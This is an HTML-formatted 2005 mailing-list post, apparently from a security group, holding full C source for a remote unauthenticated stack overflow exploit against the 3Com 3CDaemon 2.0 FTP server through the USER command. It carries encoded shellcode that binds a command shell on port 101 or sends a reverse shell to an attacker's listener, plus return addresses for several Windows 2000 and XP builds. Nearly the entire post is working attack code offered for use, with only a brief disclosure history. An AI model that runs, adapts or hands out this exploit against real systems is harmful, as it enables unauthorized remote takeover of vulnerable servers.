
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<HTML><HEAD>

<META content="text/html; charset=iso-8859-1" http-equiv=Content-Type>

<META content="MSHTML 5.00.2614.3500" name=GENERATOR>

<STYLE></STYLE>

</HEAD>

<BODY bgColor=#ffffff>

<DIV><FONT face=Arial size=2>Hat-Squad.com set a proper on that 5years old 

hole.</FONT></DIV>

<DIV><FONT face=Arial size=2>Clean code class101.org, 

class101.hat-squad.com</FONT></DIV>

<DIV><FONT face=Arial size=2>Here it is for a quick view on the 

list:</FONT></DIV>

<DIV>&nbsp;</DIV>

<DIV><FONT face=Arial size=2>/*<BR>3com 3CDaemon FTP Unauthorized "USER" Remote 

BOverflow</FONT></DIV>

<DIV>&nbsp;</DIV>

<DIV><FONT face=Arial size=2>The particularity of this exploit is to exploits a 

FTP server<BR>without the need of any authorization.</FONT></DIV>

<DIV>&nbsp;</DIV>

<DIV><FONT face=Arial size=2>Homepage: <A 

href="http://www.3com.com">www.3com.com</A><BR>version: 3CDaemon v2.0 

rev10<BR>Link: <A 

href="ftp://ftp.3com.com/pub/utilbin/win32/3cdv2r10.zip">ftp://ftp.3com.com/pub/utilbin/win32/3cdv2r10.zip</A></FONT></DIV>

<DIV>&nbsp;</DIV>

<DIV><FONT face=Arial size=2>Application Risk: Severely High<BR>Internet Risk: 

Low</FONT></DIV>

<DIV>&nbsp;</DIV>

<DIV><FONT face=Arial size=2>Hole History:</FONT></DIV>

<DIV>&nbsp;</DIV>

<DIV><FONT face=Arial size=2>&nbsp;&nbsp;14-4-2002: BOF flaw found by 

skyrim<BR>&nbsp;&nbsp;15-4-2002: crash exploit done. 

securiteam.com/exploits/5NP050A75A.html<BR>&nbsp;&nbsp;04-1-2005: Updated 

advisory by Sowhat securitytracker.com/id?1012768<BR>&nbsp;&nbsp;17-2-2005: lame 

exploit released milw0rm.com/id.php?id=825<BR>&nbsp;&nbsp;18-2-2005: proper 

exploit released hat-squad.com, class101.org, 

class101.hat-squad.com</FONT></DIV>

<DIV>&nbsp;</DIV>

<DIV><FONT face=Arial size=2>Notes:</FONT></DIV>

<DIV>&nbsp;</DIV>

<DIV><FONT face=Arial size=2>&nbsp;&nbsp;-4 bad bytes, 0x00, 0x25, 0x0D, 0x0A, 

badly interpreted by 3CDaemon<BR>&nbsp;&nbsp;-Nice call ebx offset 

found.<BR>&nbsp;&nbsp;&nbsp;Stable accross Win2k Pro&amp;Srv, SP4's serie, every 

OS languages.</FONT></DIV>

<DIV>&nbsp;</DIV>

<DIV><FONT face=Arial size=2>Greet:&nbsp; <BR>&nbsp;&nbsp;<BR>&nbsp;&nbsp;Nima 

Majidi<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Behrang 

Fouladi<BR>&nbsp;&nbsp;Pejman<BR>&nbsp;&nbsp;Hat-Squad.com 

<BR>&nbsp;&nbsp;class101.org <BR>&nbsp;&nbsp;class101.hat-squad.com</FONT></DIV>

<DIV>&nbsp;</DIV>

<DIV><FONT face=Arial size=2>*/<BR>#include &lt;stdio.h&gt;<BR>#include 

&lt;string.h&gt;<BR>#include &lt;time.h&gt;<BR>#ifdef WIN32<BR>#include 

"winsock2.h"<BR>#pragma comment(lib, "ws2_32")<BR>#else<BR>#include 

&lt;sys/socket.h&gt;<BR>#include &lt;sys/types.h&gt;<BR>#include 

&lt;netinet/in.h&gt;<BR>#include &lt;netinet/in_systm.h&gt;<BR>#include 

&lt;netinet/ip.h&gt;<BR>#include &lt;netdb.h&gt;<BR>#include 

&lt;arpa/inet.h&gt;<BR>#include &lt;unistd.h&gt;<BR>#include 

&lt;stdlib.h&gt;<BR>#include &lt;fcntl.h&gt;<BR>#endif</FONT></DIV>

<DIV>&nbsp;</DIV>

<DIV><FONT face=Arial size=2></FONT>&nbsp;</DIV>

<DIV>&nbsp;</DIV>

<DIV><FONT face=Arial size=2>char scode1[]=<BR><A 

href="file://XORed">file://XORed</A><BR>"\xEB\x26\x90\x00\x00\x00\x00\x00\x00\x02\x06\x6C\x59\x6C\x59"<BR>"\xF8\x1D\x9C\xDE\x8C\xD1\x4C\x70\xD4\x03\x58\x46\x57\x53\x32"<BR>"\x5F\x33\x32\x2E\x44\x4C\x4C\x01\xEB\x05\xE8\xF9\xFF\xFF\xFF"<BR>"\x5D\x83\xED\x2C\x6A\x30\x59\x64\x8B\x01\x8B\x40\x0C\x8B\x70"<BR>"\x1C\xAD\x8B\x78\x08\x8D\x5F\x3C\x8B\x1B\x01\xFB\x8B\x5B\x78"<BR>"\x01\xFB\x8B\x4B\x1C\x01\xF9\x8B\x53\x24\x01\xFA\x53\x51\x52"<BR>"\x8B\x5B\x20\x01\xFB\x31\xC9\x41\x31\xC0\x99\x8B\x34\x8B\x01"<BR>"\xFE\xAC\x31\xC2\xD1\xE2\x84\xC0\x75\xF7\x0F\xB6\x45\x09\x8D"<BR>"\x44\x45\x08\x66\x39\x10\x75\xE1\x66\x31\x10\x5A\x58\x5E\x56"<BR>"\x50\x52\x2B\x4E\x10\x41\x0F\xB7\x0C\x4A\x8B\x04\x88\x01\xF8"<BR>"\x0F\xB6\x4D\x09\x89\x44\x8D\xD8\xFE\x4D\x09\x75\xBE\xFE\x4D"<BR>"\x08\x74\x17\xFE\x4D\x24\x8D\x5D\x1A\x53\xFF\xD0\x89\xC7\x6A"<BR>"\x02\x58\x88\x45\x09\x80\x45\x79\x0C\xEB\x82\x50\x8B\x45\x04"<BR>"\x35\x93\x93\x93\x93\x89\x45\x04\x66\x8B\x45\x02\x66\x35\x93"<BR>"\x93\x66\x89\x45\x02\x58\x89\xCE\x31\xDB\x53\x53\x53\x53\x56"<BR>"\x46\x56\xFF\xD0\x89\xC7\x55\x58\x66\x89\x30\x6A\x10\x55\x57"<BR>"\xFF\x55\xE0\x8D\x45\x88\x50\xFF\x55\xE8\x55\x55\xFF\x55\xEC"<BR>"\x8D\x44\x05\x0C\x94\x53\x68\x2E\x65\x78\x65\x68\x5C\x63\x6D"<BR>"\x64\x94\x31\xD2\x8D\x45\xCC\x94\x57\x57\x57\x53\x53\xFE\xCA"<BR>"\x01\xF2\x52\x94\x8D\x45\x78\x50\x8D\x45\x88\x50\xB1\x08\x53"<BR>"\x53\x6A\x10\xFE\xCE\x52\x53\x53\x53\x55\xFF\x55\xF0\x6A\xFF"<BR>"\xFF\x55\xE4";</FONT></DIV>

<DIV>&nbsp;</DIV>

<DIV><FONT face=Arial size=2>char scode2[]=<BR><A 

href="file://XORed">file://XORed</A><BR>"\xD9\xEE\xD9\x74\x24\xF4\x5B\x31\xC9\xB1\x5E\x81\x73\x17\x0E\xB4"<BR>"\x9F\x23\x83\xEB\xFC\xE2\xF4\xF2\x5C\xC9\x23\x0E\xB4\xCC\x76\x58"<BR>"\xE3\x14\x4F\x2A\xAC\x14\x66\x32\x3F\xCB\x26\x76\xB5\x75\xA8\x44"<BR>"\xAC\x14\x79\x2E\xB5\x74\xC0\x3C\xFD\x14\x17\x85\xB5\x71\x12\xF1"<BR>"\x48\xAE\xE3\xA2\x8C\x7F\x57\x09\x75\x50\x2E\x0F\x73\x74\xD1\x35"<BR>"\xC8\xBB\x37\x7B\x55\x14\x79\x2A\xB5\x74\x45\x85\xB8\xD4\xA8\x54"<BR>"\xA8\x9E\xC8\x85\xB0\x14\x22\xE6\x5F\x9D\x12\xCE\xEB\xC1\x7E\x55"<BR>"\x76\x97\x23\x50\xDE\xAF\x7A\x6A\x3F\x86\xA8\x55\xB8\x14\x78\x12"<BR>"\x3F\x84\xA8\x55\xBC\xCC\x4B\x80\xFA\x91\xCF\xF1\x62\x16\xE4\x8F"<BR>"\x58\x9F\x22\x0E\xB4\xC8\x75\x5D\x3D\x7A\xCB\x29\xB4\x9F\x23\x9E"<BR>"\xB5\x9F\x23\xB8\xAD\x87\xC4\xAA\xAD\xEF\xCA\xEB\xFD\x19\x6A\xAA"<BR>"\xAE\xEF\xE4\xAA\x19\xB1\xCA\xD7\xBD\x6A\x8E\xC5\x59\x63\x18\x59"<BR>"\xE7\xAD\x7C\x3D\x86\x9F\x78\x83\xFF\xBF\x72\xF1\x63\x16\xFC\x87"<BR>"\x77\x12\x56\x1A\xDE\x98\x7A\x5F\xE7\x60\x17\x81\x4B\xCA\x27\x57"<BR>"\x3D\x9B\xAD\xEC\x46\xB4\x04\x5A\x4B\xA8\xDC\x5B\x84\xAE\xE3\x5E"<BR>"\xE4\xCF\x73\x4E\xE4\xDF\x73\xF1\xE1\xB3\xAA\xC9\x85\x44\x70\x5D"<BR>"\xDC\x9D\x23\x0E\xD1\x16\xC3\x64\xA4\xCF\x74\xF1\xE1\xBB\x70\x59"<BR>"\x4B\xCA\x0B\x5D\xE0\xC8\xDC\x5B\x94\x16\xE4\x66\xF7\xD2\x67\x0E"<BR>"\x3D\x7C\xA4\xF4\x85\x5F\xAE\x72\x90\x33\x49\x1B\xED\x6C\x88\x89"<BR>"\x4E\x1C\xCF\x5A\x72\xDB\x07\x1E\xF0\xF9\xE4\x4A\x90\xA3\x22\x0F"<BR>"\x3D\xE3\x07\x46\x3D\xE3\x07\x42\x3D\xE3\x07\x5E\x39\xDB\x07\x1E"<BR>"\xE0\xCF\x72\x5F\xE5\xDE\x72\x47\xE5\xCE\x70\x5F\x4B\xEA\x23\x66"<BR>"\xC6\x61\x90\x18\x4B\xCA\x27\xF1\x64\x16\xC5\xF1\xC1\x9F\x4B\xA3"<BR>"\x6D\x9A\xED\xF1\xE1\x9B\xAA\xCD\xDE\x60\xDC\x38\x4B\x4C\xDC\x7B"<BR>"\xB4\xF7\xD3\x84\xB0\xC0\xDC\x5B\xB0\xAE\xF8\x5D\x4B\x4F\x23";</FONT></DIV>

<DIV>&nbsp;</DIV>

<DIV><FONT face=Arial size=2>char payload[1024];</FONT></DIV>

<DIV>&nbsp;</DIV>

<DIV><FONT face=Arial size=2>char ebx[]="\x08\xB0\x01\x78";<BR>char 

ebx2[]="\xB1\x2C\xC2\x77";<BR>char pad[]="\xEB\x0C\x90\x90";<BR>char 

EOL[]="\x0D\x0A";</FONT></DIV>

<DIV>&nbsp;</DIV>

<DIV><FONT face=Arial size=2>#ifdef WIN32<BR>&nbsp;WSADATA 

wsadata;<BR>#endif</FONT></DIV>

<DIV>&nbsp;</DIV>

<DIV><FONT face=Arial size=2>void ver();<BR>void usage(char* us);</FONT></DIV>

<DIV>&nbsp;</DIV>

<DIV><FONT face=Arial size=2>int main(int argc,char 

*argv[])<BR>{<BR>&nbsp;ver();<BR>&nbsp;unsigned long gip;<BR>&nbsp;unsigned 

short gport;<BR>&nbsp;char *target, *os;<BR>&nbsp;if 

(argc&gt;6||argc&lt;3||atoi(argv[1])&gt;2||atoi(argv[1])&lt;1){usage(argv[0]);return 

-1;}<BR>&nbsp;if (argc==5){usage(argv[0]);return -1;}<BR>&nbsp;&nbsp;&nbsp; if 

(strlen(argv[2])&lt;7){usage(argv[0]);return -1;}<BR>&nbsp;&nbsp;&nbsp; if 

(argc==6)<BR>&nbsp;{<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if 

(strlen(argv[4])&lt;7){usage(argv[0]);return -1;}<BR>&nbsp;}<BR>#ifndef 

WIN32<BR>&nbsp;if 

(argc==6)<BR>&nbsp;{<BR>&nbsp;&nbsp;&nbsp;gip=inet_addr(argv[4])^(long)0x93939393;<BR>&nbsp;&nbsp;gport=htons(atoi(argv[5]))^(short)0x9393;<BR>&nbsp;}<BR>#define 

Sleep&nbsp;&nbsp;sleep<BR>#define SOCKET&nbsp;&nbsp;int<BR>#define 

closesocket(s) close(s)<BR>#else<BR>&nbsp;if 

(WSAStartup(MAKEWORD(2,0),&amp;wsadata)!=0){printf("[+] wsastartup 

error\n");return -1;}<BR>&nbsp;if 

(argc==6)<BR>&nbsp;{<BR>&nbsp;&nbsp;gip=inet_addr(argv[4])^(ULONG)0x93939393;<BR>&nbsp;&nbsp;gport=htons(atoi(argv[5]))^(USHORT)0x9393;<BR>&nbsp;}<BR>#endif<BR>&nbsp;int 

ip=htonl(inet_addr(argv[2])), port;<BR>&nbsp;if 

(argc==4||argc==6){port=atoi(argv[3]);} else port=21;<BR>&nbsp;SOCKET s;fd_set 

mask;struct timeval timeout; struct sockaddr_in 

server;<BR>&nbsp;s=socket(AF_INET,SOCK_STREAM,0);<BR>&nbsp;if 

(s==-1){printf("[+] socket() error\n");return -1;}<BR>&nbsp;if (atoi(argv[1]) == 

1){target=ebx;os="Win2k SP4 Server 

English\n[+]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 

Win2k SP4 Pro.&nbsp;&nbsp; 

English\n[+]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 

Win2k SP4 Pro.&nbsp;&nbsp; 

Norsk\n[+]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 

Win2k SP4 Server 

German\n[+]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 

Win2k SP4 Pro.&nbsp;&nbsp; 

Dutch\n[+]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 

Etc...";}<BR>&nbsp;if (atoi(argv[1]) == 2){target=ebx2;os="WinXP SP2&nbsp; Pro. 

English\n[+]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 

WinXP SP1a Pro. 

English\n[+]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 

WinXP SP1&nbsp; Pro. English";}<BR>&nbsp;printf("[+] target(s): 

%s\n",os);<BR>&nbsp;server.sin_family=AF_INET;<BR>&nbsp;server.sin_addr.s_addr=htonl(ip);<BR>&nbsp;server.sin_port=htons(port);<BR>&nbsp;connect(s,( 

struct sockaddr 

*)&amp;server,sizeof(server));<BR>&nbsp;timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&amp;mask);FD_SET(s,&amp;mask);<BR>&nbsp;switch(select(s+1,NULL,&amp;mask,NULL,&amp;timeout))<BR>&nbsp;{<BR>&nbsp;&nbsp;case 

-1: {printf("[+] select() error\n");closesocket(s);return 

-1;}<BR>&nbsp;&nbsp;case 0: {printf("[+] connect() 

error\n");closesocket(s);return 

-1;}<BR>&nbsp;&nbsp;default:<BR>&nbsp;&nbsp;if(FD_ISSET(s,&amp;mask))<BR>&nbsp;&nbsp;{<BR>&nbsp;&nbsp;&nbsp;printf("[+] 

connected, constructing the payload...\n");<BR>#ifdef 

WIN32<BR>&nbsp;&nbsp;&nbsp;Sleep(1000);<BR>#else<BR>&nbsp;&nbsp;&nbsp;Sleep(1);<BR>#endif<BR>&nbsp;&nbsp;&nbsp;strcpy(payload,"USER 

");<BR>&nbsp;&nbsp;&nbsp;memset(payload+5,0x90,700);<BR>&nbsp;&nbsp;&nbsp;memcpy(payload+5+229,&amp;pad,4);<BR>&nbsp;&nbsp;&nbsp;memcpy(payload+238,target,4);<BR>&nbsp;&nbsp;&nbsp;if 

(argc==6)<BR>&nbsp;&nbsp;&nbsp;{<BR>&nbsp;&nbsp;&nbsp;&nbsp;memcpy(&amp;scode1[5], 

&amp;gip, 4);<BR>&nbsp;&nbsp;&nbsp;&nbsp;memcpy(&amp;scode1[3], &amp;gport, 

2);<BR>&nbsp;&nbsp;&nbsp;&nbsp;memcpy(payload+253,scode1,sizeof(scode1));<BR>&nbsp;&nbsp;&nbsp;}<BR>&nbsp;&nbsp;&nbsp;else 

memcpy(payload+253,scode2,sizeof(scode2));<BR>&nbsp;&nbsp;&nbsp;strcat(payload,EOL);<BR>&nbsp;&nbsp;&nbsp;if 

(send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 1, the 

server prolly rebooted.\n");return -1;}<BR>#ifdef 

WIN32<BR>&nbsp;&nbsp;&nbsp;Sleep(2000);<BR>#else<BR>&nbsp;&nbsp;&nbsp;Sleep(2);<BR>#endif</FONT></DIV>

<DIV>&nbsp;</DIV>

<DIV><FONT face=Arial size=2>&nbsp;&nbsp;&nbsp;printf("[+] size of payload: 

%d\n",strlen(payload));<BR>&nbsp;&nbsp;&nbsp;printf("[+] payload 

sent.\n");<BR>&nbsp;&nbsp;&nbsp;return 

0;<BR>&nbsp;&nbsp;}<BR>&nbsp;}<BR>&nbsp;closesocket(s);<BR>#ifdef 

WIN32<BR>&nbsp;WSACleanup();<BR>#endif<BR>&nbsp;return 0;<BR>}</FONT></DIV>

<DIV>&nbsp;</DIV>

<DIV><FONT face=Arial size=2><BR>void usage(char* 

us)<BR>{<BR>&nbsp;printf("USAGE:\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 

[+]&nbsp; . 101_3com.exe Target VulnIP (bind 

mode)\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [+]&nbsp; . 

101_3com.exe Target VulnIP VulnPORT (bind 

mode)\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [+]&nbsp; . 

101_3com.exe Target VulnIP VulnPORT GayIP GayPORT (reverse 

mode)\n");<BR>&nbsp;printf("TARGET:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 

\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [+] 1. Win2k SP4&nbsp; 

Server English (*)\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [+] 1. 

Win2k SP4&nbsp; Pro&nbsp;&nbsp;&nbsp; English 

(*)\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [+] 1. Win2k SP4&nbsp; 

Server German&nbsp; (*)\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [+] 

1. Win2k SP4&nbsp; Pro&nbsp;&nbsp;&nbsp; China&nbsp;&nbsp; 

(*)\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [+] 1. Win2k SP4&nbsp; 

Pro&nbsp;&nbsp;&nbsp; Dutch&nbsp;&nbsp; 

(*)\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [+] 1. Win2k SP4&nbsp; 

Pro&nbsp;&nbsp;&nbsp; Norsk&nbsp;&nbsp; 

(*)\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [+] 2. WinXP SP2&nbsp; 

Pro.&nbsp;&nbsp; English&nbsp;&nbsp;&nbsp; 

\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [+] 2. WinXP SP1a 

Pro.&nbsp;&nbsp; English 

(*)\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [+] 2. WinXP SP1&nbsp; 

Pro.&nbsp;&nbsp; English&nbsp;&nbsp;&nbsp; 

\n");<BR>&nbsp;printf("NOTE:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 

\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; The exploit bind a 

cmdshell port 101 or\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 

reverse a cmdshell on your 

listener.\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; A wildcard (*) 

mean tested working, else, supposed 

working.\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Compilation msvc6, 

cygwin, Linux.\n");<BR>&nbsp;return;<BR>}<BR>void 

ver()<BR>{<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 

\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 

===================================================[0.1]=====\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 

================3COM 3CDaemon v2.0 Revision 

10===============\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 

==============FTP Service, Remote Stack 

Overflow=============\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 

======coded by class101=============[Hat-Squad.com 

2005]=====\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 

=============================================================\n");<BR>&nbsp;printf("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 

\n");<BR>}<BR></FONT></DIV>

<DIV>&nbsp;</DIV>

<DIV><FONT face=Arial 

size=2>-------------------------------------------------------------<BR>class101<BR>Jr. 

Researcher<BR>Hat-Squad.com<BR>-------------------------------------------------------------</FONT></DIV></BODY></HTML>